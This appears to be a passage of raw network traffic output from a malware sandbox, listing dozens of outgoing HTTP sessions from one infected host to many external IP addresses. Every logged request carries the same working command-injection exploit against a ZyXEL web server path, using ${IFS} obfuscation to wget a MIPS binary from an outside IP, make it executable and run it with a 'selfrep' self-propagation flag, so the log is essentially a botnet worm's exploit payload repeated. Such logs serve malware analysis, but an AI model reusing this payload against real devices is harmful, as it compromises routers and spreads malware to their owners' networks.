                                                Jan 12, 2024 18:24:51.228853941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8315192.168.2.133539677.199.57.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.228900909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8316192.168.2.1341696130.81.223.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.228931904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8317192.168.2.1334908177.100.82.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.228965998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8318192.168.2.133815854.85.135.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.229007006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8319192.168.2.1349812180.64.109.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.229074955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8320192.168.2.1352456112.190.50.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.229096889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8321192.168.2.134182627.64.57.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.229124069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8322192.168.2.1352172141.69.0.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.229176998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8323192.168.2.1358088175.40.29.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.229234934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8324192.168.2.1354940196.39.171.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.229234934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8325192.168.2.1334698119.108.148.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.229268074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8326192.168.2.13344761.67.34.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.229300976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8327192.168.2.133828613.73.106.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.229361057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8328192.168.2.13418222.158.205.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.229393005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8329192.168.2.133500881.119.139.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.229420900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8330192.168.2.134677864.206.6.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.229464054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8331192.168.2.134353887.42.57.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.229500055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8332192.168.2.1333852170.127.192.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.229542017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8333192.168.2.133565839.245.156.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.229578972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8334192.168.2.1352600110.203.25.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.229614019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8335192.168.2.1349386154.34.37.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.229660988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8336192.168.2.1359850152.150.66.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.229707003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8337192.168.2.1341324151.220.61.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.229747057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8338192.168.2.1351968156.126.122.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.229787111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8339192.168.2.1355282100.137.5.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.229804039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8340192.168.2.133800076.174.221.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.229851961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8341192.168.2.135930464.55.130.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.229907036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8342192.168.2.135157814.160.121.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.229924917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8343192.168.2.1345268158.39.202.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.229960918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8344192.168.2.1341630160.58.104.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.229984999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8345192.168.2.1334352130.88.111.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.230004072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8346192.168.2.1338316155.113.179.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.230062962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8347192.168.2.135221093.179.101.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.230088949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8348192.168.2.134990673.51.168.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.230149984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8349192.168.2.135412813.207.123.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.230178118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8350192.168.2.1356264144.55.54.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.230211020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8351192.168.2.1345782105.31.41.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.230251074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8352192.168.2.1356708191.227.165.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.230314970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8353192.168.2.133572846.124.98.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.230339050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8354192.168.2.1346584142.228.182.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.230400085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8355192.168.2.1338520207.181.0.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.230428934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8356192.168.2.1346090172.145.5.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.230465889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8357192.168.2.1343590218.219.199.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.230493069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8358192.168.2.1360572192.196.66.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.230541945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8359192.168.2.1332992172.70.84.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.230581045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8360192.168.2.134539064.28.132.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.230607033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8361192.168.2.1357992223.109.146.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.230633020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8362192.168.2.1335180184.210.168.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.230684996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8363192.168.2.134496873.106.70.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.230720043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8364192.168.2.1355226108.21.142.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.230753899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8365192.168.2.134366476.49.109.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.230789900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8366192.168.2.135360820.212.180.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.230839014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8367192.168.2.1334284135.82.85.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.230885983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8368192.168.2.1359206175.209.79.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.230910063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8369192.168.2.1338544193.146.193.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.230945110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8370192.168.2.1335686190.233.182.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.230989933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8371192.168.2.1341604194.66.237.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.231025934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8372192.168.2.135576887.186.12.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.231041908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8373192.168.2.1342508207.192.100.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.231070995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8374192.168.2.1332922186.55.81.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.231106043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8375192.168.2.134892045.10.148.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.231158018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8376192.168.2.1359392132.211.199.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.231185913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8377192.168.2.133655050.30.54.205443
                                                TimestampBytes transferredDirectionData
